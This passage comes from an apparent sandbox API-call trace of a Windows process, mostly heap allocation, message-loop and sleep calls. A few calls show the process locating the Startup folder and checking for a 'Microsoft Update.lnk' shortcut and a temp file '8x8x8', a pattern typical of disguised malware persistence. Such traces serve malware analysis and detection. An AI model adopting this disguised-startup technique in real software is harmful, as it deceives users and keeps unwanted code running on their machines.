hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0232.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0232.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0232.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.586] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0232.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0232.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0232.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0232.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0232.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0232.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0232.588] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0232.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0232.588] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0232.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0232.588] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0232.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0232.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0232.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0232.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0232.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0232.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0232.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.589] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0232.590] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0232.590] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.590] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0232.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0232.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0232.591] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0232.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0232.591] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eac90 [0232.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0232.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0232.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0232.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0232.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0232.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0232.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0232.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0232.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac90 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.592] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0232.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0232.592] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0232.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0232.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0232.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0232.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0232.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0232.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0232.593] timeGetTime () returned 0x117a1eb [0232.593] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.593] Sleep (dwMilliseconds=0xa) [0232.630] timeGetTime () returned 0x117a21a [0232.630] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.630] Sleep (dwMilliseconds=0xa) [0232.677] timeGetTime () returned 0x117a249 [0232.677] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.677] Sleep (dwMilliseconds=0xa) [0232.724] timeGetTime () returned 0x117a278 [0232.724] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0232.724] TranslateMessage (lpMsg=0x8cf798) returned 0 [0232.724] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0232.724] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0232.724] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0232.724] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.724] Sleep (dwMilliseconds=0xa) [0232.756] timeGetTime () returned 0x117a297 [0232.756] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0232.756] Sleep (dwMilliseconds=0xa) [0232.771] timeGetTime () returned 0x117a2a7 [0232.771] PeekMessageW (in: 